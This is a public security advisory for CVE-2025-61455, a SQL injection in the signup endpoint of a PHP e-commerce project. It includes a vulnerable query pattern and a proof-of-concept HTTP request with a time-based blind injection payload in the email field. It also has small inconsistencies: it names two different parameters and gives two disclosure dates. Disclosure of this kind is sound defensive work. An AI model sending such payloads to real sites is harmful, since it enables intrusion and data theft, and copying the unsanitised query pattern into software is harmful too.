
Public disclosure and proof-of-concept for CVE-2025-61455, a critical SQL injection in E-commerce Project v1.0, including technical details, PoC, and mitigation recommendations.
Disclosure Date: 14 October 2025
CVE ID: CVE-2025-61455
Severity: CRITICAL (CVSS 9.8)
A critical SQL Injection vulnerability exists in E-commerce Project v1.0, specifically within the signup.inc.php endpoint. The application directly incorporates unsanitized user inputs into SQL queries, allowing unauthenticated attackers to bypass authentication and execute arbitrary SQL commands.
This issue has been assigned the identifier CVE-2025-61455. At the time of public disclosure, no official patch was available.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpThe application uses unsanitized input directly in SQL queries without any input validation or prepared statements. The vulnerability exists in the aid parameter of the signup.inc.php file.
An attacker can inject malicious SQL code through the email parameter, enabling time-based blind SQL injection attacks.
Example vulnerable code pattern:
$query = "SELECT * FROM table WHERE email='$email'";
This allows for injection payloads that can manipulate query logic and extract sensitive data.
| CWE ID | Title |
|---|---|
| CWE-89 | Improper Neutralization of Special Elements used in an SQL Command |
| Score | Severity | Vector String |
|---|---|---|
| 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
A successful exploitation could result in:
git clone https://github.com/Bhabishya-123/E-commerce.git
Use XAMPP/LAMP to deploy the project and navigate to:
http://localhost/e-commerce-main/includes/signup.inc.php
Send the following malicious HTTP request:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
Explanation:
The email parameter contains a time-based SQL injection payload: '+(select*from(select(sleep(20)))a)+'
If the application delays for 20 seconds before responding, the SQL injection is successful.
mysqli_prepare() or PDO).| Event | Date |
|---|---|
| Vulnerability Discovered | 16 September 2025 |
| Public Disclosure | 13 October 2025 |
| Patch Available | ❌ Not available as of disclosure |
This vulnerability was discovered and responsibly disclosed by:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 This advisory is published independently due to lack of vendor response.